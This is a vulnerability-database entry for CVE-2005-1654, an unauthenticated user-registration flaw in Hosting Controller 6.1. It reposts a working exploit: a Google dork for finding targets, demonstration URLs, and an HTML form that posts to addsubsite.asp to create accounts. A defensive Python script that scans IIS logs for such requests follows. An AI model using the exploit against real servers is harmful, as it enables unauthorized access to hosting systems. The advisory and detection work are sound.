Hosting Controller Vulnerability

Vulnerability ID: 1108751
Vulnerability type: Unknown
Published: 2005-05-04
Updated: 2005-10-20
CVE ID: CVE-2005-1654
CNNVD-ID: CNNVD-200505-1104
Platform: Windows
CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/979
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-1104
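|Vulnerability details
Hosting Controller 6.1 Hotfix 1.9 and earlier allows remote attackers to register arbitrary users via a direct request to addsubsite.asp with the loginname and password parameters set.
|Exploit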
<!--
Tested 

google = intext:"powered by Hosting Controller" intitle:"Hosting Controller"

/str0ke

Advisory Information
-------------------------
Software Package   : Hosting Controller
Vendor Homepage  : http://www.hostingcontroller.com
Platforms               : Windows based servers
Vulnerability           : unauthenticated user registration
Risk                       : High!
Vulnerable Versions: All version ( Tested on: v.6.1 Hotfix 1.9 )
Vendor Contacted   : 5/3/2005
Release Date          : 5/5/2005

Summary
------------
Hosting Controller is a complete array of Web hosting automation tools for
the Windows Server family platform.
This vulnerability is on the admin/hosting/addsubsite.asp
Attacker can create user and host on the target system.

Exploit
---------
A demonstration exploit URL is provided:

http://[target]/admin/hosting/addsubsite.asp?loginname=Mouse&password=123456
http://[target]:8077/hosting/addsubsite.asp?loginname=Mouse&password=123456
-->

<FORM action="http://[target]/admin/hosting/addsubsite.asp" method="post">
<INPUT type="hidden" name="reseller" value="resadmin" id="reseller" >
<INPUT type="hidden" name="domaintypecheck" value="SECOND" id="Hidden1">
Domain:     <INPUT name="DomainName" value="shabgard.org" id="Hidden2"><BR>
Username: <INPUT name="loginname" value="Mouse" id="Hidden3"><BR>
<INPUT type="hidden" name="Quota" value="-1" id="Hidden4">
<INPUT type="hidden" name="htype" value="27" id="htype" >
<INPUT type="hidden" name="choice" value="1" id="Hidden7" >
<INPUT type="hidden" name="mailaccess" value="TRUE" id="Hidden5">
Mailserver: <INPUT name="MailServerType" value="IMail" id="Hidden6"><BR>
Password:  <INPUT name="password" value="123456" id="Hidden8"><BR><BR>
<input type="submit" value="Make"><BR>

# milw0rm.com [2005-05-04]
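
A defender-side check for the request pattern described above, as an added example that is not part of the original advisory: it scans IIS W3C extended logs for requests to addsubsite.asp that carry loginname and password in the query string, and flags POSTs to the same page for review because IIS does not log the request body. The log lines are constructed sample data, and the function name and reason labels are hypothetical.

```python
from urllib.parse import parse_qs

# Constructed IIS W3C extended log sample (not taken from the advisory).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2005-05-06 10:01:12 192.0.2.10 GET /admin/hosting/addsubsite.asp loginname=Mouse&password=123456 200
2005-05-06 10:02:40 192.0.2.11 GET /admin/default.asp - 200
2005-05-06 10:03:05 192.0.2.12 POST /hosting/AddSubSite.asp - 200
2005-05-06 10:04:19 192.0.2.13 GET /admin/hosting/addsubsite.asp - 302
"""

TARGET = "/addsubsite.asp"  # page named in the advisory; IIS paths are case-insensitive


def scan(log_text):
    """Return (client_ip, method, status, reason) for each suspicious request."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            # The column layout can change mid-file, so re-read it every time.
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or not fields:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue  # malformed or truncated record
        rec = dict(zip(fields, parts))
        if not rec.get("cs-uri-stem", "").lower().endswith(TARGET):
            continue
        query = rec.get("cs-uri-query", "-")
        params = set()
        if query != "-":
            params = {k.lower() for k in parse_qs(query, keep_blank_values=True)}
        if {"loginname", "password"} <= params:
            reason = "credentials-in-query"   # matches the URL form in the advisory
        elif rec.get("cs-method", "").upper() == "POST":
            reason = "post-body-not-logged"   # form variant; needs manual review
        else:
            continue
        hits.append((rec.get("c-ip"), rec.get("cs-method"), rec.get("sc-status"), reason))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit)
```

Hits with the post-body-not-logged reason include legitimate account creation by logged-in resellers, so they need to be correlated with the panel's own session or audit records.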
|References

Source: MISC
Link: http://isun.shabgard.org/hc3.txt
Source: SECUNIA
Name: 15271
Link: http://secunia.com/advisories/15271
